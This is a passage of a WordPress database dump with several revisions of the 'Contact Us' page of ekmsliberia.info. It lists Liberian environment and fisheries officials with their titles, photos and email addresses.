title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 13:36:26','2021-01-18 13:36:26','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3364,42,'2021-01-18 14:23:35','2021-01-18 14:23:35','','lavalah','','inherit','open','closed','','lavalah','','','2021-01-18 14:23:35','2021-01-18 14:23:35','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png',0,'attachment','image/png',0),(3367,42,'2021-01-18 14:31:07','2021-01-18 14:31:07','','','','inherit','open','closed','','mr-wesseh','','','2021-01-18 14:47:12','2021-01-18 14:47:12','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png',0,'attachment','image/png',0),(3368,42,'2021-01-18 14:31:53','2021-01-18 14:31:53','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 14:31:53','2021-01-18 14:31:53','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3369,42,'2021-01-18 14:31:53','2021-01-18 14:31:53','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 14:31:53','2021-01-18 14:31:53','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3370,42,'2021-01-18 14:31:54','2021-01-18 14:31:54','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"mr wesseh\" alt=\"mr wesseh\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a 